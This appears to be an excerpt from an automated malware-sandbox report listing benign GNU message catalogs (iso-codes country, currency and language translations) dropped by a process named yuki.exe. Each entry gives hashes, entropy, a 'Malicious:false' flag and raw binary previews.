                                                                                                    Preview:................l...9............#.......#.......#.......#.......#.......#.......#.......#.......#.......#.......$.......$......$$......7$......?$......E$......O$......W$......b$......j$......r$......}$.......$.......$.......$.......$.......$.......$.. ....$.......$.......$.. ....$.......%......3%......<%......J%......Q%......p%.......%.......%.......%.......%.......%.......%.......%.......%.......%.......%.......&.......&.......&.......&......%&......=&......F&......_&..,...{&.......&.......&..%....&.......&.......&.......&.......&.......'.......'.......'...... '......('..%...7'..,...]'.."....'..*....'.......'.......'.......'.......'.......(......!(......)(....../(......;(......M(......U(......](......f(......o(.......(..'....(..$....(.......(.......).......)......:)......Y)......w)......|).......).......).......).......).......).......).......).......).......).......).......*.......*.......*....../*......6*......@*......H*......S*......X*......b*......k*......r*.......*.......*......
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 4893 messages, Project-Id-Version: iso_3166-2 ''As\304\253r'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):215191
                                                                                                    Entropy (8bit):5.341154793825851
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3072:X/yvM+H4NFvtHluTODkvvojbEo/Ay5hKNur1N9QH6d/C9KrVFjY8w1UKGbn8QygK:X/0YNXQZvojLYOLVC96VOQnBub
                                                                                                    MD5:C3ED67D0AF4CCCC3A6FBA2B93991F924
                                                                                                    SHA1:4E9FC335886D3DE67720B97961019B84BBAE6CD5
                                                                                                    SHA-256:467ABCB4C1DBF08B0851CC6B2BE9DA1FD8C8CAE45B2855389264263963B21ED1
                                                                                                    SHA-512:D3612A6A466636E45D42B8D273C5B0B8889AF3310987200262904EF092E96222C8A747B67A84E29532B1BD91585F1C93D289364999C38BD355A09CB8246A6C3B
                                                                                                    Malicious:false
                                                                                                    Preview:.........................1....................................................".......*.......1.......E.......S.......a.......f.......n.......s.......|.........................................................................................................................."...............8.......A.......G.......[.......e.......r.......w....................................................................................................................".......(.......5.......;.......D.......H.......O.......U...+...[............................................................................................................%......./.......9.......F.......S.......b.......m............................................................................................................-.......B.......V.......b.......o.......y....................................................................................................$...............;.......E.......T.......a.......o.......
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 32 messages, Project-Id-Version: iso_3166-3 'Brits Antarctisch Territorium'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):2959
                                                                                                    Entropy (8bit):5.1779730317097705
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:rLf3b+L5llOZ+vGqIfdvqN5CoUlJmkICjqSpFSD6oETDiAkTMz:rLvUOZ+yaComJmk5OAEaA4
                                                                                                    MD5:A57E2FD83C614F5A7F6C0A15A162754D
                                                                                                    SHA1:8B949C26AEA660C3FDE02C8B4BB2B3D9E21510A5
                                                                                                    SHA-256:4332CF61F6E3F24A3A2D02D03E1D107DD931E3144DD51C4E2D1E03A1551F89A6
                                                                                                    SHA-512:1157638956006169EC08D6E7C0F9352E98EDDA9CCC26E45DF061E9F7A3A8EBA6892D5874A80093C4146BC0A7638A1C3EFCC044C354722B37FC5AD1A80181747E
                                                                                                    Malicious:false
                                                                                                    Preview:........ ...........+.......................).......*...........:.../...W...........................................)...........................9.......I.......X.......m.......z...!....................................... .......)...........5... ...N.......o...2...{...+.............................../...)...Z...Y...........=...........................*.......5.......O...*...d...........................................................&...........D.......U.......k.......r...,......./............... ...................:...1...K.......}........... ....................................................................................................................................................................British Antarctic Territory.Burma, Socialist Republic of the Union of.Byelorussian SSR Soviet Socialist Republic.Canton and Enderbury Islands.Czechoslovakia, Czechoslovak Socialist Republic.Dahomey.Dronning Maud Land.East Timor.France, Metropolitan.French Afars and Issas.French Southern
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 180 messages, Project-Id-Version: iso_4217 'ADB Eenheid van een rekening'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):10365
                                                                                                    Entropy (8bit):4.943921130831523
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:fqFmZVhbww6VRyK0G/2LCntxHIf9wnpLsSNsSWUgdrHTKgdAgISd7Z:SYftww6TL0G/Uo/HIVwnpLsSNsSCd5Ek
                                                                                                    MD5:9911C82D658E1ADD85FAD8AAD713B8E9
                                                                                                    SHA1:6F00CD7D2E633A04D50D19AC9335E760DD770138
                                                                                                    SHA-256:6D125E6FBAE644588C3E6E82AC9E9F63ABD2B2613CBFD3981A9E676D38D4A7D8
                                                                                                    SHA-512:8EB8644FD0CF1F4E6AAED0DF4B11FAEE047F1304E816580DBA04388C648C8D9545DF8CC7FA9E4938CDC76FB94F5FAAA1EED71DD62BC860DC0B305287564CB854
                                                                                                    Malicious:false
                                                                                                    Preview:........................\....... .......!.......5.......=.......L.......[.......i.......w...........................................................................................1...!...3...S...9.......7...................................$.......2.......B.......Q.......[.......m.......}...........0...................................................................9.......F.......M.......Z.......`.......o.......u...............................................................................................................%.......-.......;.......I.......Z.......b.......p.......}.......................................................................................................................................(.......5.......?.......D.......T.......b.......t...........!...................................................................................1.......D.......V.......i.......r.......................................................................................................
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 1915 messages, Project-Id-Version: iso_639-3 'Aari'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):86365
                                                                                                    Entropy (8bit):5.09944606086632
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:1536:Mr4ZbiONmLUHLySyBm+Rb2CSHDvTdn75vnShADemfvteEAr:q4lIUHLT0m+nU7dnAme8FeEc
                                                                                                    MD5:A17FD3194E18F8E8175C0D9A9DB7762B
                                                                                                    SHA1:FF5E54E089A77ED1A6271F127648C11D5B22E5FF
                                                                                                    SHA-256:E02EC0161044C37CDDF05618BF7FD76DCFC572CAD4BE863E775ACF8EA15DC733
                                                                                                    SHA-512:48D5BC781F1D5E75B1D7541CB08B527C09EEF7040CDFD92A4AB3D826C06FFC04920DF52CC3A08A30CF753620058534E3831CCF86E1F9C519D90B22F12274DAF0
                                                                                                    Malicious:false
                                                                                                    Preview:........{........;.......w.......................................................................................................(.......8.......=.......C.......G.......T.......Y.......^.......d.......i.......q.......x........................................................................................................................................................".......)...............2.......8.......=.......R.......Y.......b.......l.......t.......|........................................................................................................................................................................$.......*.......-.......5.......<.......E.......N.......S.......].......e.......i.......n.......s.......|.........................................................................................................................................4.......I.......X.......g.......m.......}..........................................................
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 116 messages, Project-Id-Version: iso_639-5 'Afro-Aziatische talen'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):7532
                                                                                                    Entropy (8bit):4.809861187663467
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:XohhvFk/Dxi2cBOLPsqsRSlSE0BfCuXr5VcJHVCQW8tGzwgSeZaIjGGJY6VexP5:4SDxnPFSE0BfNcaCSW
                                                                                                    MD5:006553457A1C6BDA37FFEFFA9FC2818A
                                                                                                    SHA1:C3CB789CE55AC2BFD34907F6EB530A4B7DFA16DF
                                                                                                    SHA-256:7AA8417C9B30F3D62CF9AE0A6A79778385F45166E484A93D496833089EB60BCE
                                                                                                    SHA-512:6693075CFA8698371CD89BD9B7D564C760FE8AA1E9EE9533669F77377B2BA67F1E212AFF2D203A817AA2F338F58954D9E724F4E6B2A745D38384E0A28D014B14
                                                                                                    Malicious:false
                                                                                                    Preview:........t...............\............................................... .......5.......F.......W.......h.......{...............................................................&.......9.......I.......Y.......i.......y...................................!.......#...................2.......C.......T.......g.......x...$.......#.......%...........................".......:...#...P.......t.......................................................................*.......8.......H.......`.......w...............................................................................7.......G.......X.......h.......|...............................................................1.......J.......[.......l...............................................................................'.......9.......P.......a.......r...............................................................(.......9.......H.......Y.......j...........................#...........................................".......8.......I.......X.......
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 77 messages, Project-Id-Version: iso_15924 'arabisk'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):3464
                                                                                                    Entropy (8bit):4.63798702217428
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:CoJTL+p16ljqv2oqfHo/VTMIiiWJdONgX3JlUzC8Xz/lAynqQaQWKR0ctFj:1pKf6levug/V4Ip23JlZDyn7aDpmFj
                                                                                                    MD5:1EC26858FD5BAE0C2DB3239E17FBCF93
                                                                                                    SHA1:90E040C5C611A9D0FB1D9CEE245E643775C98221
                                                                                                    SHA-256:0AA6D4576DCC3B1CE6CEE66007C5AD2CC6C107BBB0B8F33D248F7C4655E3AD72
                                                                                                    SHA-512:91310761CBD17CA07E084CF1B7FA109A2F9B25DC49B5C343A89B7E76E852EBFA6BD984DE88E5557CE1367E1FD638AFD3BAF44B2B3CAF487B7CF1D662340E88CE
                                                                                                    Malicious:false
                                                                                                    Preview:........M...........g...........................................................................................................................................................................'.......9.......N.......Y.......`.......f.......o.......x...............................................................................................................................................................%.......+.......6.......B.......H.......P.......].......f.......q.......|...................................................................................................................................%...................2.......A...k...D.......................................................................................................................".......(.......0.......;.......E.......W.......j...............................................................................................................................................................%.......,.......6.......
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 402 messages, Project-Id-Version: nn 'Afghanistan'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):21966
                                                                                                    Entropy (8bit):4.997191938254033
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:PoR6zELK4PoqmBKibZfVjj5wsOP4XOAEOurmNwo1T4+kybAdTqtE:gRfNoqGZ9XmsOP4XOAEjELkybANqi
                                                                                                    MD5:746E49DAEC4B7AA35E6C337A7E8A248C
                                                                                                    SHA1:B7CBBC27626059EE32F93A94C39FC9C5A05A07F5
                                                                                                    SHA-256:1A93677E4885C029C289A4F7BA35B1DC0AD94929BBF03B959EF124A2C2B9F164
                                                                                                    SHA-512:68D9F030B14DED76E281119AA6501C9D9901E5D501E5C70C2B4C532EF6136401DED5C99D5210737EF59505F536586F14824A513BAA011F9ACBC801AC9D5C34FD
                                                                                                    Malicious:false
                                                                                                    Preview:........................<........!.......!.......!.......!.......!.......!.......!.......!.......!.......!......."......*"......4"......G"......O"......U"......_"......g"......r"......z".......".......".......".......".......".......".......".......".. ....".......".......".......#......"#......+#......9#......@#......_#......v#.......#.......#.......#.......#.......#.......#.......#.......#.......#.......#.......#.......#.......$......!$......*$......C$..,..._$.......$.......$..%....$.......$.......$.......$.......$.......$.......$.......$..%....%..,...0%.."...]%..*....%.......%.......%.......%.......%.......%.......%.......%.......&.......&...... &......(&......0&......9&......U&..'...c&..$....&.......&.......&.......&.......'......%'......*'......2'......9'......G'......X'......h'.......'.......'.......'.......'.......'.......'.......'.......'.......'.......'.......'.......'.......(.......(.......(.......(...... (.......(......5(......;(..!...W(......y(.......(.......(.......(..0...
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 31 messages, Project-Id-Version: nn 'Britisk antarktis'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):2601
                                                                                                    Entropy (8bit):5.153896878521266
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:VADzza4NMvGqIfdvqNuuUoSOlWXykSTNOJ9UzE:qDn4yBudSrQOqE
                                                                                                    MD5:4A06BE3FF3D61377FFA38AC7866F5378
                                                                                                    SHA1:D0BFAA1AE7925970F3733EF392DC3935CA894D8C
                                                                                                    SHA-256:D0C8209FB7D8AF7ED945BD8EA1CECCA07A9C84F6DFF3F0E90D54A9FA518F6A93
                                                                                                    SHA-512:D83A35B6073D7994543E33A2AA9C49594B9C605FBFD824973828990C68F9D30E4C9D8E9098E26703C3B7C87345574BAC4DBCDE0DBE8135E2F562CCBF7BD7E964
                                                                                                    Malicious:false
                                                                                                    Preview:....................).......................).......*...........".../...?.......o.......w...........................)...........................!.......1.......@.......U.......b...!...o................................... .......)............... ...6.......W...2...c.......................D.......V...4...f...........8...........................................+...+...A..."...m..................................................."...................0.......E.......L.......Z...3...r...........$...............'....................................................................................................................................................................................British Antarctic Territory.Burma, Socialist Republic of the Union of.Byelorussian SSR Soviet Socialist Republic.Canton and Enderbury Islands.Czechoslovakia, Czechoslovak Socialist Republic.Dahomey.Dronning Maud Land.East Timor.France, Metropolitan.French Afars and Issas.French Southern and Antarctic Territori
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 140 messages, Project-Id-Version: iso_4217 'Afghanske afghani'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):7566
                                                                                                    Entropy (8bit):4.816400916957066
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:QuMFkS2j72xzSg7pFxpzbUxIv8ldS3kxKm9qAJYk3IcJgLaCv9L8nYZ:j72TwGEOkJz6k3IcEhd8nYZ
                                                                                                    MD5:C9EF8E08B47F4907AF7C8CCB2DB8807B
                                                                                                    SHA1:36F61CB80963D015F910F3FEAE6103EB5438297F
                                                                                                    SHA-256:DF66A790666A38BBD1B061A448798AF02698D4C8AE690793BB9DA4AFE1E3EC4F
                                                                                                    SHA-512:A4859A5222C061A1A947784CC5977EE11B56985B810E01FD21A6C85941E0A5738CFB48F38D25A8BA7BFFCE36F972D4628327FBAF4E4303D62E46F995BEA85CD5
                                                                                                    Malicious:false
                                                                                                    Preview:................|......................................................................./.......>.......C.......J.......Z.......h.......y...............................................................................................'.......3.......E.......P.......].......d.......q.......w....................................................................................................... .......0.......5.......<.......D.......R.......c.......k.......y...............................................................................................................................$.......1.......;.......@.......P.......b.......r.......................................................................................................(.......0.......?.......I.......P.......^.......n.......w...............................................................................................................................#.......4.......K.......O......._.......f.......v...............................
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 176 messages, Project-Id-Version: iso_639-3 'Abkhasisk'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):7462
                                                                                                    Entropy (8bit):4.715757676485261
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:uTxfdrBMfAm1sYO8y5aTM0mLjPNr2IpD1+x7WNqyQppk4:uTXryfL+YOlkTMjjlBQDe4
                                                                                                    MD5:AEC6C80DC6FD9B21AE25CD216343AA6E
                                                                                                    SHA1:E49E241BCD7BE5CC50C01CD02936261997074E21
                                                                                                    SHA-256:7FF38D7224C4A6C12A72F25CE86718525A0038D36FF52818C128F2E9EE1F4164
                                                                                                    SHA-512:8C2661504B8DDBBC10B29EE485338D90CC494A9479DDD22F171091F22D03670E1DB879C938F4D171F0E6DF35F3440711AB2AE4534AB30E45586E0CC22C54C2BE
                                                                                                    Malicious:false
                                                                                                    Preview:........................................................................................................................(......./.......8.......A.......H.......P.......W.......c.......l.......t.......|.......................................................................................................................................................................0.......8.......T.......^.......g.......k.......q.......y.......................................................................................................................................................".......,.......6.......:.......?...:...J.......................................................................................................................................#.......+......./.......5.......=.......H.......R.......k.......v...............................................................................................................................................................'...............9.......
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 184 messages, Project-Id-Version: iso_3166-1 'Afghanistan'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):7830
                                                                                                    Entropy (8bit):4.643398675865676
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:els7HuYrCJFNhOstTHFUTaf0sKopWTjFUUaf082hh:mbLrsYzFUWf9KokfFUjfh2hh
                                                                                                    MD5:E9B8820AC6F329CF0EF556923D912DF2
                                                                                                    SHA1:3FA5C946B7AA64B79AC3D80C194A279536183806
                                                                                                    SHA-256:442744890C2B5166DD776592AE75E65A49E3CF4CC04567694F6C3D9E73A16E59
                                                                                                    SHA-512:8CD8E4715F39D37E4E005587354C21383E4FD1605AF57373D9878150F3D9F1525ACA9C837C80F2EB9A9134475FD273561C6E07AAAB13223ADE313417A6E74170
                                                                                                    Malicious:false
                                                                                                    Preview:................................................................................................................................................................ .......(.......0.......;.......D.......L.......T.......[.......a.......i.......p.......x............................................................................................................................... .......&.......1.......9.......>.......E.......T.......\.......e.......n.......................................................................................................................................................#.......-.......5.......:.......D.......K.......Y.......`.......f.......o.......y.......................................................................................................................................................................!.......+.......6.......A.......H.......Q.......Z......._.......e.......v...............................................................................
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 13 messages, Project-Id-Version: iso_3166-2 'American Samoa'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):932
                                                                                                    Entropy (8bit):4.986349047903934
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:sq9OgZ+dS98nhNkyzYSt0UREvLIXmFhNkybEYnF3:s/dS9ehNpU/UmvLpFhNpwYnF3
                                                                                                    MD5:4429E10B36E525334AB91D21C8DD32DE
                                                                                                    SHA1:4860DA228118231B5FE0173A680731B75B1D6330
                                                                                                    SHA-256:6219C3381FAFE237CC4784C68EFFFD70032A7F0FAA0462FD463E33491AF6F0D1
                                                                                                    SHA-512:41F737B3312EFD9FFDFCA2CE334DDD01ECE171E50183140E3D40B2B0589ABAC2D2B10B8F49A2147709691CD426EB60D9DAF1DB0862665A22C37EFB48A4D8175F
                                                                                                    Malicious:false
                                                                                                    Preview:................................0.......1.......@.......F.......M.......V.......^.......c.......m.......r.......x...............................1.......@.......F.......M.......V.......^.......c.......m.......r.......x........................................................................................American Samoa.Aruba.Belize.Djibouti.Georgia.Guam.Guatemala.Mali.Niger.Northern Mariana Islands.Puerto Rico.Zaire.Project-Id-Version: iso_3166-2.Report-Msgid-Bugs-To: https://salsa.debian.org/iso-codes-team/iso-codes/issues.PO-Revision-Date: 2002-11-13 15:30+0200.Last-Translator: Jerry Thobejane <jerry@translate.org.za>.Language-Team: Northern Sotho <sepedi@translate.org.za>.Language: nso.MIME-Version: 1.0.Content-Type: text/plain; charset=UTF-8.Content-Transfer-Encoding: 8bit.X-Generator: KBabel 1.0beta2..American Samoa.Aruba.Belize.Djibouti.Georgia.Guam.Gautemala.Mali.Niger.Lebowa la Mariana Islands.Puerto Rico.Zaire.
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 2 messages, Project-Id-Version: iso_3166-3 'Netherlands Antilles'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):521
                                                                                                    Entropy (8bit):5.187497277945643
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:icK1xjt02Ukh/E8T0xtexAvgXmBQWiR8ZAp:fW5t0UREvLIXmg
                                                                                                    MD5:C9D99CD6E434B809B107CF4B369DB177
                                                                                                    SHA1:A6F1C5CF6B53562FAFC63CC59FC6D654AA45B06C
                                                                                                    SHA-256:39F6B738FD8F54985675430978380C9B6D3C1D3418AEAB0BBB4A222BE32EEDAE
                                                                                                    SHA-512:11B09101FBEC762ED38A55FE71E82FE7FBABBF7B613B0FB4A5A4B18AF3D9FB5D50EC0E44C9A8CF5B8F4849A778E0203AAB2438E4F2B31377E62184A5257FFED4
                                                                                                    Malicious:false
                                                                                                    Preview:................,.......<.......P.......Q.......f................................Netherlands Antilles.Project-Id-Version: iso_3166-3.Report-Msgid-Bugs-To: https://salsa.debian.org/iso-codes-team/iso-codes/issues.PO-Revision-Date: 2002-11-13 15:30+0200.Last-Translator: Jerry Thobejane <jerry@translate.org.za>.Language-Team: Northern Sotho <sepedi@translate.org.za>.Language: nso.MIME-Version: 1.0.Content-Type: text/plain; charset=UTF-8.Content-Transfer-Encoding: 8bit.X-Generator: KBabel 1.0beta2..Netherlands Antilles.
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 60 messages, Project-Id-Version: iso_639-3 'Seburu'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):2872
                                                                                                    Entropy (8bit):4.646649791428897
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:fM68wAvRhSE0DOQyIjQ5p+L69hziMUXvLpGdQ0sO3D7WpwVzJn:fB8w0YBDOSUX3riMAvdYQ01kwtp
                                                                                                    MD5:FE25660F3A4A7FA2C22970A9811F1C75
                                                                                                    SHA1:7FE0D5E91D908A19884EA94E0A1AB06FF3584027
                                                                                                    SHA-256:940CE5FD966629D4B85DEC61DB441C562D46522005B2EDEFDBD6FC639FAEFCA7
                                                                                                    SHA-512:4B683C542FC73CB12B2F519A62CB78AC4520DF30BDEF854BC480EC6CC0364A06C0A13AC45B6BF8A93D5A7162EB1CE9700DD59297B6C8FC55E3CC17FAD8C39C2C
                                                                                                    Malicious:false
                                                                                                    Preview:........<...........S...........(.......).......3.......:.......C.......O.......V.......a.......i.......p.......z.......................................................................................................................................................................$.......,.......4.......?.......J.......R.......X.......b.......t.......{.......................................................................................................................................................................................................................................................................(.......1.......;.......D.......R......._.......k.......v.......................................................................................................................#...............7.......A.......X.......b.......p.......|...............................................................................................................................(.......0...............
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 85 messages, Project-Id-Version: iso_3166-1 'Dzi\305\202igaii Bik\303\251yah'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):5808
                                                                                                    Entropy (8bit):5.260294453956496
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:TN+TSD5YxsgXFhRTokfLku2wxey9aMLLk52q7KoosKPPiv:/YxjXVo4Lkk/LLLk52q7bQav
                                                                                                    MD5:E687CBAAB0AA35D075885F76A904BC65
                                                                                                    SHA1:C8EF76E404FCA8708FB10146E7E9C81DDDE26EBF
                                                                                                    SHA-256:4EFC0464D9037A47C2ECFC28F7C23BB39AC4B97A354B2D7AE87E4FCE6FECE7B3
                                                                                                    SHA-512:A2EF60061B5C6DB7E32F507C4330A07B38644C3CBE3BDCEFDEC6B9FAE3EE0615A887A5DBBF21D103A58E17505D6796CE06EFBFBADCEC84476A9C6140C1D412E2
                                                                                                    Malicious:false
                                                                                                    Preview:........U...........q...l.......0.......1.......9.......A.......I.......S.......[.......f.......n.......u.......}...............................................................................................................5.......=.......D.......L.......S.......].......k.......s.......{.......................................................................................................................................................%.......+.......7.......?.......F.......O.......`.......e.......q.......x.......................................................................................................................................*.......2.......G.......V.......o.......y...............................k...6...............................,...................-...#...M.......q...........!.......................-...........!...)...2.......\.......x...........................=.......'...%.......M.......m...........'...............................7...........%..."...E.......h...'...
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 37 messages, Project-Id-Version: 'Arab'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1713
                                                                                                    Entropy (8bit):4.629314251353993
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:cHapnxTH1LfEpCwcvySKjNLiu4N9WUJCDlVvd:c6pxTH17EpCvEN4vW+ChVvd
                                                                                                    MD5:EE837205044F66AEBFBDA38D0D846E36
                                                                                                    SHA1:C87FF8BFC67BEC0D16A8D3057D6DB3FA0449D6C3
                                                                                                    SHA-256:25B24D137A5497035EB84A9618CF04A91926631576CFE7EAC1F42CFAF6D58D9F
                                                                                                    SHA-512:3FB0755A042388B57B1326514C50DDC79D4DE002374DA61ABBE2D617A2CCF0B78C71992DFFABEEC503C66CC67971E72E2481C64EA5D9AEDEC369FB811D843771
                                                                                                    Malicious:false
                                                                                                    Preview:........%.......D...5...l.......@.......A.......H.......Q.......Z.......`.......h.......p.......y.......................................................................................................................................................................................).......1.......8.......>.......E.......J...B...R.......................................................................................................................................................".......(.......1.......7.......=.......E.......M.......W.......a.......h.......r.......x.......................................................................!...$..............................................."... .......#...................................................................................................................%............Arabic.Armenian.Balinese.Batak.Bengali.Braille.Buginese.Carian.Cherokee.Coptic.Cyrillic.Gothic.Greek.Gujarati.Gurmukhi.Hebrew.Javanese.Kannada.Khmer.Lao.Latin.Limbu.Ly
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 425 messages, Project-Id-Version: iso_3166-1 'Afganistan'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):23749
                                                                                                    Entropy (8bit):5.01845304395756
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:a0Wswrfn6CnT5WqL67eY1cCb+z5wsWP48WAINiZGsWwg1rDrplAEs4A:osqtnL67VcyImsWP48WAI+W31rP7AEnA
                                                                                                    MD5:5FD951713DF81AF94E3A681E2C1935DA
                                                                                                    SHA1:A3436B628A23582AFE639BFD8933C585E50D5671
                                                                                                    SHA-256:C77E9BC2E5A577A913F06439857993596C9915BF2B4DC4EDBF1F4C7D808C717C
                                                                                                    SHA-512:C3B893ACA09A6F428FC72C980E9DBBA8FF066B3D74DA4EAA32AC131014215EF32220678BCED9C930B3AD5B7AACB32AAE7529D3366485A520C61CA33D76558337
                                                                                                    Malicious:false
                                                                                                    Preview:................d...9............#.......#.......#.......#.......#.......#.......#.......#.......#.......#.......#.......$.......$......'$....../$......5$......?$......G$......R$......Z$......b$......m$......v$......~$.......$.......$.......$.......$.. ....$.......$.......$.. ....$.......%......#%......,%......:%......A%......`%......w%.......%.......%.......%.......%.......%.......%.......%.......%.......%.......%.......%.......%.......&.......&......-&......6&......O&......k&......s&..%...y&.......&.......&.......&.......&.......&.......&.......&.......&.......&..%....&..,... '.."...M'..*...p'.......'.......'.......'.......'.......'.......'.......'.......'.......'.......(.......(...... (......)(......2(......N(..'...\(..$....(.......(.......(.......(.......(.......)......:)......?)......G)......N)......\)......m)......}).......).......).......).......).......).......).......).......).......).......).......*.......*.......*.......*......%*.......*......5*......C*......J*......P*..!...
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 123 messages, Project-Id-Version: oc 'Ain'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):5637
                                                                                                    Entropy (8bit):4.752446275977486
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:gIIDdoVVGHdGIi+VhAsiVBiWnIt1yi2VZOitqrw/yhIhqtuRlbTPrhyo12K4F:aZoVQBi+7YvieIeiqZOitqrw/XhFxTDa
                                                                                                    MD5:5C570E1EEF5F9417165E225B64BB622A
                                                                                                    SHA1:835473FF6B4D3D3781F12F171A96291D93B46A35
                                                                                                    SHA-256:220EC8EDDC5FA2C57597DF00C94959DD23B5E72F39A6793F78819B072E1D18D3
                                                                                                    SHA-512:B6BEA2D92CB6A645D631D81DDDC7DC9CCF211035E01D82A2563AD74AB17C474D2C079AA8DC6B2E7A4ABCE48E43C1655D975E6C910A4B75B806CD7F6BF0F4695F
                                                                                                    Malicious:false
                                                                                                    Preview:........{.......................h.......i.......m.......s.......z...............................................................................................................................(.......1.......8.......A.......S.......X.......a.......g.......t.......{...............................................................................................................................................................).......3.......?.......M.......Y.......e.......r.......................................................................................................................!.......(.......8.......<.......K.......S.......^.......e.......t.......y.......................................................................................................................................................+.......8.......O.......e.......l.......q.......x...................................................................$...................".......&......./.......7.......>.......E.......
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 13 messages, Project-Id-Version: iso_3166-3 'Tim\303\262r \303\210st'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1105
                                                                                                    Entropy (8bit):5.137070808140005
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:lPz6MyTmibUqgqqvL5t0UK7Ks812b9XmUiBdtRRic:NBqavLoUo81285D
                                                                                                    MD5:ECF920C7C382ACA588F7B84C38862068
                                                                                                    SHA1:B22508B2E3C613B3FE288264C4F5B15F4512C301
                                                                                                    SHA-256:102A72BA4E52FD19F3C257B2DD0A369802B27A1376465E07C265378ECD7C3857
                                                                                                    SHA-512:518D1C5595DD791DEF55643345298C7D65E766D736EFC4E78B8C691BE4E4D10F33F14566C520673B608A62AAE5F5242822C34D421A8AB2F41897A24E7D28DC7E
                                                                                                    Malicious:false
                                                                                                    Preview:................................0.......1.......<.......Q.......l........................................... .......................q...'.......................................................................................4.......<........................................................................East Timor.France, Metropolitan.German Democratic Republic.Gilbert and Ellice Islands.Midway Islands.Netherlands Antilles.Neutral Zone.Serbia and Montenegro.Upper Volta, Republic of.Viet-Nam, Democratic Republic of.Wake Island.Zaire, Republic of.Project-Id-Version: iso_3166-3.Report-Msgid-Bugs-To: https://salsa.debian.org/iso-codes-team/iso-codes/issues.PO-Revision-Date: 2008-11-10 00:45+0100.Last-Translator: Joan Luc Lab.rda <laborde@crpp.u-bordeaux.fr>.Language-Team: Occitan <laborde@crpp.u-bordeaux.fr>.Language: oc.MIME-Version: 1.0.Content-Type: text/plain; charset=UTF-8.Content-Transfer-Encoding: 8bit..Tim.r .st.Fran.a Metropolitana.Republica Dominicana.Irlanda.Irlanda.Holanda.
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 5 messages, Project-Id-Version: iso_4217 'Euro'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):527
                                                                                                    Entropy (8bit):5.099122001891158
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:iCgE0qfl0WPvkSnPJVxRt02Ukf/1zoFiXmBQWiaT2l:YE0qR0SVPt0UX1znXmFTC
                                                                                                    MD5:B56DA8D9C720E49BADC4A0E83D4E788C
                                                                                                    SHA1:025E1AF11D45A7D84422F92587662F4A51146158
